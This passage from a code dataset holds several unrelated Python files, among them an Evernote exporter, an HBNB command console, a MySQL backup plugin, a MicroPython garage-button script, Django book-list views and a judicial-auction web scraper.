metadata['contentLength'] = contentLength\n # metadata['notebookGuid'] = notebookGuid\n # metadata['tagGuids'] = tagGuids\n metadata['tagNames'] = tagNames\n # metadata['resourcesCount'] = len(resources)\n\n # save resources\n note_resource_dir = os.path.join(note_dir, 'resources')\n if not os.path.exists(note_resource_dir):\n os.makedirs(note_resource_dir)\n\n resource_metas = []\n\n for r in resources or []:\n r_meta = save_resources(r, note_resource_dir)\n resource_metas.append(r_meta)\n\n metadata['resourceMetas'] = resource_metas\n\n # print(metadata)\n # save metadata\n meta_filename = os.path.join(note_dir, meta_file_basename)\n with 
open(meta_filename, 'w') as fw:\n json.dump(metadata, fw, indent=4, ensure_ascii=False)\n\n # save enex file\n text_file = os.path.join(note_dir, enex_file_basename)\n with open(text_file, 'w') as f_enex:\n f_enex.write(content)\n\n\ndef save_resources(resource, note_resource_dir):\n\n body = resource.data.body\n bodyHash = resource.data.bodyHash # bytes\n bodyHashHex = bytes.hex(bodyHash)\n bodySize = resource.data.size\n\n width = resource.width\n height = resource.height\n duration = resource.duration\n\n updateSequenceNum = resource.updateSequenceNum\n\n mime = resource.mime\n sourceURL = resource.attributes.sourceURL\n originalName = resource.attributes.fileName\n isAttachment = resource.attributes.attachment\n\n res_meta = {\n 'bodyHashHex': bodyHashHex,\n 'bodySize': bodySize,\n\n 'width': width,\n 'height': height,\n 'duration': duration,\n\n 'updateSequenceNum': updateSequenceNum,\n\n 'mime': mime,\n 'sourceURL': sourceURL,\n 'originalName': originalName,\n 'isAttachment': isAttachment,\n }\n\n ext = mimetypes.guess_extension(mime) or '.binary'\n filename = os.path.join(note_resource_dir, '%s%s' % (bodyHashHex, ext))\n with open(filename, 'wb') as fw:\n fw.write(body)\n\n return res_meta\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"evernote2/tools/export_notes.py","file_name":"export_notes.py","file_ext":"py","file_size_in_byte":11398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"304747553","text":"#!/usr/bin/python3\n\n\"\"\"Defines the HBNH command line.\"\"\"\n\n\nimport cmd\nimport json\n\nfrom shlex import split\n\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\nfrom models import storage\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\"Hbnb command processor.\"\"\"\n\n prompt = '(hbnb) '\n file = None\n __classes = {\n \"BaseModel\",\n \"User\",\n \"Place\",\n \"State\",\n \"City\",\n \"Amenity\",\n \"Review\"\n }\n\n __commands = {\n \"show\",\n \"count\",\n \"all\",\n \"destroy\",\n \"update\"\n }\n\n def precmd(self, line):\n \"\"\" Get the line before interpretate\"\"\"\n if len(line):\n l_c = line.split()\n if len(l_c):\n l_last = line.split(\"{\")\n l_upd = line.split(\"\\\"\")\n all_instances = storage.all()\n ll_cc = l_c[0].split(\"(\")\n c_l = ll_cc[0].split(\".\")\n if len(ll_cc) == 2:\n l_arg = ll_cc[1].split(\"\\\"\")\n else:\n return line\n if len(c_l) == 2 and c_l[0] in self.__classes\\\n and c_l[1] in self.__commands:\n s_c = c_l[1] + \" \" + c_l[0]\n if ll_cc[1] == \")\":\n return s_c\n elif len(l_arg) == 3 and l_arg[2] == \")\":\n return s_c + \" \" + l_arg[1]\n elif len(l_upd) == 7 and l_upd[6] == \")\":\n return s_c + \" \" + l_arg[1] + \" \"\\\n + l_upd[3] + \" \\\"\" + l_upd[5] + \"\\\"\"\n elif len(l_last):\n try:\n dict_up = json.loads(\n str(\"{\" + l_last[1][:-1].replace(\"'\", \"\\\"\")))\n s_c = c_l[0] + \" \" + l_arg[1]\n for k, v in dict_up.items():\n self.do_update(\n s_c + \" \\\"\" + k + \"\\\" \\\"\" + str(v) + \"\\\"\")\n ans = c_l[1] + \" \" + s_c + \" \\\"\" + \\\n k + \"\\\" \\\"\" + str(v) + \"\\\"\"\n return ans\n except:\n return line\n else:\n return line\n else:\n return line\n else:\n return line\n else:\n return line\n\n def do_count(self, argv):\n \"\"\"Count how much instances have a given class\"\"\"\n l_c = argv.split()\n all_instances = storage.all()\n if l_c[0] in self.__classes:\n 
num = 0\n for k, ob in all_instances.items():\n if l_c[0] in k:\n num = num + 1\n print(num)\n else:\n print(\"** class doesn't exist **\")\n\n def help_count(self):\n \"\"\"Help command for count\"\"\"\n\n msg = \"Count how much instances have a given class\\n\"\n print(msg)\n\n def emptyline(self):\n \"\"\"Empty line method\"\"\"\n pass\n\n def do_quit(self, arg):\n \"\"\"Quit command to exit the program\"\"\"\n\n quit()\n return True\n\n def help_quit(self):\n \"\"\"Help command for quit\"\"\"\n print(\"Quit command to exit the program\\n\")\n\n def do_EOF(self, line):\n \"\"\"EOF command to exit the program\"\"\"\n print()\n return True\n\n def help_EOF(self):\n \"\"\"Help command for EOF\"\"\"\n print(\"EOF command to exit the program\\n\")\n\n def do_create(self, arg):\n \"\"\"Create a BaseModel and save the json in a file\"\"\"\n\n if len(arg) > 0:\n list_arg = arg.split()\n if list_arg[0] in HBNBCommand.__classes:\n print(eval(list_arg[0])().id)\n storage.save()\n else:\n print(\"** class doesn't exist **\")\n else:\n print(\"** class name missing **\")\n\n def help_create(self):\n \"\"\"Help command for create\"\"\"\n print(\"Create a BaseModel and save the json in a file\\n\")\n\n def do_show(self, arg):\n \"\"\"Prints the string representation of an instance\n based on the class name and id\"\"\"\n\n if len(arg) > 0:\n list_arg = arg.split()\n objects = storage.all()\n if len(list_arg) >= 2:\n clsId = list_arg[0] + '.' + list_arg[1]\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n print(objects[clsId])\n else:\n print(\"** no instance found **\")\n else:\n if len(list_arg) == 1:\n objs_cls = [e.split('.')[0] for e in list(objects.keys())]\n if arg not in objs_cls:\n print(\"** class doesn't exist **\")\n else:\n print(\"** instance id missing **\")\n else:\n print(\"** class name missing **\")\n\n def help_show(self):\n \"\"\"Help command for show\"\"\"\n\n msg = \"Prints the string representation of an instance \"\n msg += \"based on the class name and id\\n\"\n print(msg)\n\n def do_destroy(self, arg):\n \"\"\"Deletes an instance based on the class name and id\"\"\"\n\n if len(arg) > 0:\n list_arg = arg.split()\n objects = storage.all()\n if len(list_arg) >= 2:\n clsId = list_arg[0] + '.' 
+ list_arg[1]\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n del objects[clsId]\n storage.save()\n else:\n print(\"** no instance found **\")\n else:\n if len(list_arg) == 1:\n objs_cls = [e.split('.')[0] for e in list(objects.keys())]\n if arg not in objs_cls:\n print(\"** class doesn't exist **\")\n else:\n print(\"** instance id missing **\")\n else:\n print(\"** class name missing **\")\n\n def help_destroy(self):\n \"\"\"Help command for destroy\"\"\"\n print(\"Deletes an instance based on the class name and id\\n\")\n\n def do_all(self, arg):\n \"\"\"Prints all string representation of all instances\n based or not on the class name\"\"\"\n\n objects = storage.all()\n if len(arg) > 0:\n list_arg = arg.split()\n clsObjs = [str(v) for k, v in objects.items()\n if list_arg[0] == k.split('.')[0]]\n if len(clsObjs) > 0:\n print(clsObjs)\n else:\n print(\"** class doesn't exist **\")\n else:\n allObjs = [str(v) for k, v in objects.items()]\n print(allObjs)\n\n def help_all(self):\n \"\"\"Help command for all\"\"\"\n\n msg = \"Prints all string representation of all instances \"\n msg += \"based or not on the class name\\n\"\n print(msg)\n\n def do_update(self, arg):\n \"\"\"Updates an instance based on the class name\n and id by adding or updating attribute\"\"\"\n\n if len(arg) > 0:\n objects = storage.all()\n list_arg = split(arg)\n if len(list_arg) == 1:\n clsObjs = [str(v) for k, v in objects.items()\n if arg == k.split('.')[0]]\n if len(clsObjs) > 0:\n print(\"** instance id missing **\")\n else:\n print(\"** class doesn't exist **\")\n elif len(list_arg) == 2:\n clsId = '.'.join(list_arg)\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n print(\"** attribute name missing **\")\n else:\n print(\"** no instance found **\")\n elif len(list_arg) == 3:\n clsId = list_arg[0] + '.' + list_arg[1]\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n if list_arg[2]:\n print(\"** value missing **\")\n else:\n print(\"** no instance found **\")\n else:\n clsId = list_arg[0] + '.' 
+ list_arg[1]\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n if list_arg[2]:\n obj = objects[clsId]\n if HBNBCommand.RepresentsInt(list_arg[3]):\n setattr(obj, list_arg[2], int(list_arg[3]))\n elif HBNBCommand.RepresentsFloat(list_arg[3]):\n setattr(obj, list_arg[2], float(list_arg[3]))\n else:\n setattr(obj, list_arg[2], list_arg[3])\n obj.save()\n else:\n print(\"** value missing **\")\n else:\n print(\"** no instance found **\")\n else:\n print(\"** class name missing **\")\n\n def help_update(self):\n \"\"\"Help command for update\"\"\"\n\n msg = \"Updates an instance based on the class \"\n msg += \"name and id by adding or updating attribute\\n\"\n msg += \"Usage: update \"\n msg += \"\\\"\\\"\\n\"\n print(msg)\n\n @staticmethod\n def RepresentsInt(str):\n try:\n int(str)\n return True\n except ValueError:\n return False\n\n @staticmethod\n def RepresentsFloat(str):\n try:\n float(str)\n return True\n except ValueError:\n return False\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21118160","text":"#!/usr/bin/env python3\n\"\"\"misqldb plugin for the db wrapper.\n\nConnects to MySQL, reads and extracts tables and performs other operations\nrequired in a backup pr restore operation using the mysql client from\nhttps://pypi.org/project/mysqlclient/.\n\nBearable: Tolerable backup and restore.\nhttps://www.github.com/Effenberg0x0/bearable\n\nAlvaro Leal , 2019\n\"\"\"\nimport MySQLdb\nimport MySQLdb.cursors\n\n\nclass DB(object):\n def __init__(self, profile, connect=False):\n self.profile = profile\n self.connection = None\n if connect:\n self.connect()\n\n def connect(self, no_db=False, reconnect=False):\n \"\"\"\n \"\"\"\n if self.connection is not None:\n if not reconnect:\n raise MySQLdb._exceptions.Error(\"Already connected!\")\n\n if self.profile[\"connection_type\"] == \"local\":\n self.connection = self._connect_local(no_db)\n\n elif self.profile[\"connection_type\"] == \"remote\":\n self.connection = self._connect_remote(no_db)\n\n def _connect_local(self, no_db=False):\n if no_db:\n connection = MySQLdb.connect(user=self.profile[\"user\"],\n passwd=self.profile[\"password\"],\n )\n\n else:\n connection = MySQLdb.connect(user=self.profile[\"user\"],\n passwd=self.profile[\"password\"],\n db=self.profile[\"database\"]\n )\n return connection\n\n def _connect_remote(self, no_db=False):\n if no_db:\n connection = MySQLdb.connect(host=self.profile[\"host\"],\n port=self.profile[\"port\"],\n user=self.profile[\"user\"],\n passwd=self.profile[\"password\"],\n )\n\n else:\n connection = MySQLdb.connect(host=self.profile[\"host\"],\n port=self.profile[\"port\"],\n user=self.profile[\"user\"],\n passwd=self.profile[\"password\"],\n db=self.profile[\"database\"]\n )\n return connection\n\n def list_tables(self):\n if self.connection is None:\n self.connect()\n\n cursor = self.connection.cursor()\n cursor.execute(\"SHOW TABLES\")\n table_list = cursor.fetchall()\n return [table[0] for table in table_list]\n\n def get_table_fields_metadata(self, table):\n if self.connection is None:\n self.connect()\n cursor = self.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SHOW FIELDS FROM {0}\".format(table))\n fields_metadata = cursor.fetchall()\n return fields_metadata\n\n def get_table_data(self, table=None):\n if 
self.connection is None:\n self.connect()\n\n if table is None:\n table_names = self.list_tables()\n else:\n table_names = [table]\n\n tables = []\n if table_names:\n for table_name in table_names:\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT * FROM {0};\"\n .format(table_name))\n # tables.append({\"table_name\": table_name,\n # \"data\": cursor.fetchall()})\n tables.append(cursor.fetchall())\n\n return tables\n\n def get_db_data(self):\n if self.connection is None:\n self.connect()\n\n tables_data = []\n # TODO: Implement include_only_tables, exclude_tables logic.\n tables = self.list_tables()\n for table in tables:\n table_dict = {}\n table_metadata = self.get_table_fields_metadata(table)\n table_data = self.get_table_data(table)[0]\n table_dict[\"table_name\"] = table\n table_dict[\"table_fields\"] = table_metadata\n table_dict[\"table_data\"] = table_data\n tables_data.append(table_dict)\n return tables_data\n\n def create_db(self, db_name):\n if self.profile[\"connection_type\"] == \"local\":\n connection = self._connect_local(no_db=True)\n\n elif self.profile[\"connection_type\"] == \"remote\":\n connection = self._connect_remote(no_db=True)\n\n cursor = connection.cursor()\n cursor.execute(\"CREATE DATABASE {0};\".format(db_name))\n\n def create_table(self, table_name, table_fields):\n if self.connection is None:\n self.connect()\n\n fields_string = \"\"\n for i, field in enumerate(table_fields):\n fields_string += \"{0} {1}\".format(field[\"Field\"], field[\"Type\"])\n if i < (len(table_fields) - 1):\n fields_string += \", \"\n\n query_string = \"CREATE TABLE {0} ({1});\".format(table_name,\n fields_string)\n print(query_string)\n cursor = self.connection.cursor()\n cursor.execute(query_string)\n\n def add_to_table(self, table_name, table_data):\n if self.connection is None:\n self.connect()\n\n for row in table_data:\n insert_string = (\"INSERT INTO {0} VALUES {1};\"\n .format(table_name,\n tuple(field for field in row)))\n\n print(insert_string)\n cursor = self.connection.cursor()\n cursor.execute(insert_string)\n","sub_path":"plugins/db/mysqldb/_mysqldb.py","file_name":"_mysqldb.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"74436330","text":"from machine import Pin # for pin read/write\r\nimport machine # for hard resetting after http req\r\nimport network # for wifi conenction\r\nimport urequests # for http request\r\nimport time # for delay in http request and debouncing\r\n\r\ndef onboardledToggle(var):\r\n if var == 'on':\r\n onboardLed(0)\r\n if var == 'off':\r\n onboardLed(1)\r\ndef wait_pin_change(pin):\r\n # wait for pin to change value\r\n # it needs to be stable for a continuous 20ms\r\n cur_value = pin.value()\r\n active = 0\r\n while active < 20:\r\n if pin.value() != cur_value:\r\n active += 1\r\n else:\r\n active = 0\r\n time.sleep_ms(1)\r\n\r\ndef do_connect():\r\n sta = network.WLAN(network.STA_IF)\r\n if not sta.isconnected():\r\n led.value(0)\r\n sta.active(True)\r\n sta.connect('SSID', 'PASSWORD')\r\n while not sta.isconnected():\r\n pass\r\n if sta.isconnected():\r\n led.value(1)\r\n\r\n# Button shield connects pin D0, normally HIGH\r\nbutton = Pin(0, Pin.IN)\r\n# Onboard ESP chip led\r\nonboardLed = Pin(2, Pin.OUT) # define pin and \r\nonboardledToggle('off')\r\n# 5mm led on D1\r\nled = Pin(5, Pin.OUT)\r\n# Prevents spamming of serial\r\npressedMessagePrinted = False\r\nnotPressedMessagePrinted = False\r\n\r\nwhile True:\r\n sta = 
network.WLAN(network.STA_IF)\r\n    if not sta.isconnected():\r\n        do_connect()\r\n    else:\r\n        if button.value(): #button not pressed\r\n            if not notPressedMessagePrinted:\r\n                print('Button not pressed')\r\n                notPressedMessagePrinted = True\r\n                pressedMessagePrinted = False\r\n                onboardledToggle('off')\r\n\r\n        else: #button pressed\r\n            wait_pin_change(button)\r\n            if not pressedMessagePrinted:\r\n                print('Button pressed')\r\n                onboardledToggle('on')\r\n                pressedMessagePrinted = True\r\n                notPressedMessagePrinted = False\r\n\r\n                res = urequests.get(\"http://192.168.1.102/control?cmd=GPIO,5,1\") # garage door relay on\r\n                parsedRes1 = res.json()\r\n                if parsedRes1['log'] == 'GPIO 5 Set to 1':\r\n                    res2 = urequests.get(\"http://192.168.1.102/control?cmd=GPIO,5,0\")\t# garage door relay off\r\n                    parsedRes2 = res2.json()  # parse the relay-off response, not the stale first one\r\n                    if parsedRes2['log'] == 'GPIO 5 Set to 0': # modify to the proper key-string pair to achieve smd led functionality; if not needed just comment these lines.\r\n                        onboardledToggle('off')\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"102069480","text":"import streamlit as st\nfrom src.processing.eda import PlotPairplot, Plot3D\nfrom config import config\n\ndef DataVisualizationBody(df):\n\n    st.write(\"## Data Visualization\")\n    st.write(\"---\")\n\n    st.write(\"#### Pair Plot\")\n    PlotPairplot(df,config.ClfIrisSpecies_TARGET)\n\n    st.write(\"---\")\n    st.write(\"#### 3D Plot\")\n    Plot3D(df,config.ClfIrisSpecies_TARGET)\n\n","sub_path":"app_pages/page_data_visualization.py","file_name":"page_data_visualization.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"620183128","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Statement: Sorry for this shit code \n@Time : 2020/4/9 17:41\n@Author : Jarvis\n\"\"\"\nimport os\nimport argparse\n\nTRAIN_ERROR_PATH = '/code/errors/train'\nPREDICT_ERROR_PATH = '/code/errors/predict'\nif not os.path.exists(TRAIN_ERROR_PATH):\n    os.makedirs(TRAIN_ERROR_PATH)\nif not os.path.exists(PREDICT_ERROR_PATH):\n    os.makedirs(PREDICT_ERROR_PATH)\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--train', type=str, help='id of the task to train')\n    parser.add_argument('--predict', type=str, help='id of the task to predict')\n    parser.add_argument('--rm-version', type=int, help='delete the given version')\n\n    args = parser.parse_args()\n    if args.train:\n        # model training\n        task_id = args.train\n        os.popen(f\"nohup python /code/base_run.py --train {task_id} > {TRAIN_ERROR_PATH}/{task_id}.out 2>&1 &\")\n\n    if args.predict:\n        # model prediction\n        task_id = args.predict\n        os.popen(f\"nohup python /code/base_run.py --predict {task_id} > {PREDICT_ERROR_PATH}/{task_id}.out 2>&1 &\")\n","sub_path":"run_oil_model.py","file_name":"run_oil_model.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"2451027","text":"# coding: utf-8\nfrom datetime import datetime\nimport asyncio\nimport re\n\nfrom w3lib.html import remove_tags\n\nfrom app import config\nfrom app.spider.base import Spider\nfrom app.spider.estate.jd.mixin import JDJudicialSaleConfigMixin\nfrom app.exceptions import ServiceUnavailable\nfrom app.utils.functions import coroutine_wrap\nfrom app.utils.log import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass JDJudicialSaleSpider(Spider, 
JDJudicialSaleConfigMixin):\n\n async def _crawl_judicial_sale_cases(self, **kwargs):\n try:\n payload_packet = self.get_payload_packet(ptype=self.ptype.LIST, **kwargs)\n except ServiceUnavailable:\n return []\n\n data = await self.fetch(**payload_packet, return_type=dict)\n\n if not self._check_data(data):\n return []\n\n return await self._crawl_all(data, **kwargs)\n\n async def _crawl_all(self, data, **kwargs):\n data_list = data\n\n if len(data_list) == self.PAGE_SIZE: # 相等说明返回的数据是\"满\"的\n concurrent_pages = 5 # 并发爬取的页数\n page = 2 # 从第二页开始, 第一页数据已经有了\n has_more = True # 有更多数据\n while has_more:\n fs = []\n for i in range(concurrent_pages):\n kwargs[\"page\"] = page + i\n payload_packet = self.get_payload_packet(ptype=self.ptype.LIST, **kwargs)\n f = asyncio.ensure_future(self.fetch(**payload_packet, return_type=dict))\n fs.append(f)\n\n for f in asyncio.as_completed(fs):\n result = await f\n if result is None:\n continue\n\n if len(result) != self.PAGE_SIZE:\n has_more = False\n\n data_list.extend(result)\n\n page += concurrent_pages\n\n return data_list\n\n async def _crawl_house_area_unit_price(self, data_list, timeout=None):\n final_data = []\n\n fs = []\n for item in data_list:\n house_area = self._title_contains_house_area(item[\"title\"])\n\n if house_area: # 如果标题里有房屋面积,直接提取。\n del item[\"paimaiId\"]\n item[\"houseArea\"] = house_area\n item[\"unitPrice\"] = round(item[\"totalPrice\"] / house_area * 10000)\n final_data.append(item)\n\n else: # 标题里没有房屋面积就只能发请求\n payload_packet = self.get_payload_packet(ptype=self.ptype.PRODUCT_INFO, paimaiId=item.pop(\"paimaiId\"))\n wrapped_coro = coroutine_wrap(self.fetch(**payload_packet, timeout=timeout, return_type=dict), item)\n f = asyncio.ensure_future(wrapped_coro)\n fs.append(f)\n\n fs2 = []\n for f in asyncio.as_completed(fs):\n result, (item,) = await f\n if result is None:\n final_data.append(item)\n else:\n payload_packet = self.get_payload_packet(ptype=self.ptype.PRODUCT_DESC, **result)\n wrapped_coro = coroutine_wrap(self.fetch(**payload_packet, timeout=timeout, return_type=str), item)\n f2 = asyncio.ensure_future(wrapped_coro)\n fs2.append(f2)\n\n for f in asyncio.as_completed(fs2):\n result, (item,) = await f\n if result:\n house_area = self._parse_house_area(result)\n if house_area:\n item[\"houseArea\"] = house_area\n item[\"unitPrice\"] = round(item[\"totalPrice\"] / house_area * 10000)\n\n final_data.append(item)\n\n return final_data\n\n @staticmethod\n def _check_data(data):\n if data is None: # 请求异常\n return False\n\n if not data: # 空列表,无数据\n return False\n\n return True\n\n async def get_judicial_sale_case(self, **kwargs):\n async with self.aio_session:\n results = await self._crawl_judicial_sale_cases(**kwargs)\n\n if not results:\n return []\n\n keyword = kwargs[\"keyword\"]\n\n data_list = []\n for item in results:\n try:\n title = item[\"title\"]\n if keyword in title:\n data_list.append({\n \"targetUrl\": f\"http://mpaimai.jd.com/{item['id']}\",\n \"cover\": f\"http://img12.360buyimg.com/imgw/s{config.COVER_WIDTH}x{config.COVER_HEIGHT}_{item['productImage']}\",\n \"title\": title[title.find(keyword):],\n \"property\": \"\",\n \"houseType\": \"\",\n \"houseArea\": \"\",\n \"towards\": \"\",\n \"totalPrice\": round(item[\"currentPrice\"] / 10000),\n \"unitPrice\": \"\",\n \"houseStorey\": \"\",\n \"totalStorey\": \"\",\n \"tags\": [],\n \"auctionTime\": datetime.fromtimestamp(item[\"endTime\"] / 1000).strftime(\"%Y-%m-%d\"),\n \"dataSource\": self.data_source,\n\n \"paimaiId\": item[\"id\"], # 详情页ID, 爬房屋面积计算面积均价用\n })\n 
except Exception as e:\n logger.exception(f\"{e}: {item}\")\n continue\n\n data_list = await self._crawl_house_area_unit_price(data_list)\n\n return data_list\n\n @staticmethod\n def _parse_house_area(text):\n text = remove_tags(text)\n match_obj = re.search(r\"(\\d+(\\.\\d+)?)\\s*[㎡平]\", text) # r\"(\\d+(\\.\\d+)?)(㎡|平方)\"\n if match_obj:\n return float(match_obj.group(1))\n return None\n\n @staticmethod\n def _title_contains_house_area(title):\n match_obj = re.search(r\"(\\d+(\\.\\d+)?)[㎡平]\", title)\n if match_obj:\n return float(match_obj.group(1))\n return None\n","sub_path":"app/spider/estate/jd/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"503034580","text":"import numpy\n\ndef combine_info (fname1, fname2, fname3):\n\n with open(fname1, 'r') as myfile1, open(fname2, 'r') as myfile2:\n \n names = numpy.loadtxt(myfile1, dtype='string')\n emails = numpy.loadtxt(myfile2, dtype='string')\n\n for (item1, item2, item3, item4) in zip(\n names[:,0], names[:,1], names[:,2], emails):\n item1 = item1.replace(\"'\", \"\")\n print (\"{:<{}} {:<{}} {:<{}} {}\\n\".format(\n item1, len(max(names[0], key=len)),\n item2, len(max(names[1], key=len)),\n item3, len(max(names[2], key=len)),\n item4)\n )\n","sub_path":"astr109/combine_names_emails.py","file_name":"combine_names_emails.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"614968222","text":"######################################\n## Read in Scattering Cross Section ##\n######################################\ndef scatter_read_in(file_path,reverse=0):\n ''' read in scattering data base in format given by http://www.nndc.bln.gov/'''\n ''' Input: File path [type=string], Reverse[set to 0 or 1]; Output: Energy [eV], Cosine, Probability '''\n ''' reverse is needed because the database calles a backscatter +1 and a forward scatter -1 and I use a backscatter = -1 and a forward scatter = +1'''\n f = open(file_path,'r')\n raw = f.read().splitlines()\n cosine , probs , energy= [] , [] , []\n index = 1\n while index < len(raw)-2:\n if raw[index][0] == 'I':\n temp = raw[index].split(':')\n temper = temp[1].split('eV')\n energy.append(float(temper[0]))\n index += 3\n new_line = raw[index].split(' ')\n cos , prob = [] , []\n while raw[index] != raw[0] and index < len(raw)-1:\n new_line = raw[index].split(' ')\n cos.append(float(new_line[0]))\n prob.append(float(new_line[1]))\n index += 1\n if reverse == 1: \n cos.reverse()\n cosine.append(cos)\n probs.append(prob)\n else:\n index += 1 \n return energy,cosine,probs\n###################################\n## Read in Elastic Cross Section ##\n###################################\ndef elastic_read_in(file_path):\n ''' Read in database data in format given by http://www.nndc.bnl.gov/ '''\n ''' Input: file_path [type=string]; Output: Energy [eV], Cross Section [b] ''' \n f = open(file_path,'r')\n f = f.read().splitlines()\n f = f[1:]\n Data = []\n for i in f:\n Data.append(i.split(','))\n Data = [[float(i)for i in line] for line in Data]\n Energy = [col[0] for col in Data]\n XC = [col[1] for col in Data]\n return Energy,XC\n","sub_path":"BackEnd/DataBaseReadInFunctions.py","file_name":"DataBaseReadInFunctions.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"557300786","text":"from 
django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import Book\nfrom .forms import BookForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom registro.models import User\nfrom django.http import HttpResponse\nimport logging\nimport jwt, base64\n\n\ndef RedirectLoginToMenu(request):\n\tlogin = request.COOKIES.get('login')\n\tusuario = User.objects.get(login=login)\n\tnome_usuario = usuario.nome\n\t# pass the variable itself, not the string 'nome_usuario'\n\treturn render(request, 'user_menu.html', {'nome': nome_usuario})\n\n\ndef AllBooks(request):\n\tqueryset = Book.objects.all()\n\tAddBookToList(request)\n\tcontext = { \"books_list\":queryset }\n\treturn render(request, 'books_list.html',context)\n\n\n\ndef MyBooks(request):\n\tlogin = request.COOKIES.get('login')\n\tusuario = User.objects.get(login=login).mybooks.all()\n\tRemoveBookFromList(request)\n\tcontext = { \"my_books\":usuario }\n\treturn render(request, 'my_books.html',context)\n\n\n\ndef RegisterBook(request):\n\tif request.method=='POST':\n\t\tnew_book_form = BookForm(request.POST)\n\t\tif new_book_form.is_valid():\n\t\t\tbook = new_book_form.save()\n\t\t\tbook.save()\n\t\t\tlogging.info('book created')\n\t\t\treturn redirect( '/lista/')\n\telse:\n\t\tnew_book_form = BookForm()\n\t\treturn render(request,\"new_book.html\",{ 'form':new_book_form})\n\n\ndef AddBookToList(request):\n\tif request.method=='POST':\n\t\tlogin = request.COOKIES['login']\n\t\tbook = request.POST.get('book')\n\t\tusuario = User.objects.get(login=login)\n\t\ttry:\n\t\t\t# get() raises Book.DoesNotExist when the book is not on the list yet\n\t\t\tusuario.mybooks.get(id=book)\n\t\t\tlogging.info('book is already on your list')\n\t\t\treturn\n\t\texcept Book.DoesNotExist:\n\t\t\tbook_obj = Book.objects.get(id=book)\n\t\t\tusuario.mybooks.add(book_obj)\n\t\t\tlogging.info('book added to your list')\n\t\t\tmessages.info(request, 'The book was added!')\n\t\t\treturn\n\n\telse:\n\t\treturn\n\n\n\ndef RemoveBookFromList(request):\n\tif request.method=='POST':\n\t\tlogin = request.COOKIES['login']\n\t\tbook = request.POST.get('book')\n\t\tusuario = User.objects.get(login=login)\n\t\tbook_obj = Book.objects.get(id=book)\n\t\tusuario.mybooks.remove(book_obj)\n\t\tlogging.info('book removed from your list')\n\t\tmessages.info(request, 'The book was removed!')\n\t\treturn\n\n","sub_path":"projeto-django/src/livros/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"171109775","text":"class Square:\n    def __init__(self, side):\n        self.side = side\n        self.square = self.side ** 2\n        print(self.square)\n\n    def __pow__(square1, square2):\n        return(square1.square ** square2.square)\n\nsquare1 = Square(3)\nsquare1\nsquare2 = Square(2)\nsquare2\nprint(\"The power of the two squares is {}\".format(square1 ** square2))\n","sub_path":"square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"136826635","text":"from room import Room\nfrom player import Player\nfrom world import World\n\nimport random\nimport os\nfrom ast import literal_eval\n\nclass Queue():\n    def __init__(self):\n        self.queue = []\n    def enqueue(self, value):\n        self.queue.append(value)\n    def dequeue(self):\n        if self.size() > 0:\n            return self.queue.pop(0)\n        else:\n            return None\n    def size(self):\n        return len(self.queue)\n\nclass Stack():\n    def __init__(self):\n        self.stack = 
